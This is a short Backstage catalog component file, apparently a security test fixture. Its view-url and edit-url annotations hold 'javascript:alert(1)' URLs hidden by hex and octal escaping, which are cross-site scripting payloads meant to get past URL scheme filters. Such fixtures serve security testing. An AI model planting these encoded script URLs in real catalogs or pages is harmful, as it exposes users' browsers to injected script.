apiVersion: backstage.io/v1alpha1
kind: Component
metadata:
  name: tg-testing
  description: TG Testing Component
  annotations:
    backstage.io/view-url: "\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)"
    backstage.io/edit-url: "\152\141\166\141\163\143\162\151\160\164\072alert(1)" 
spec:
  type: website
  owner: user:default/rhdh-sec-test2
  lifecycle: test-8
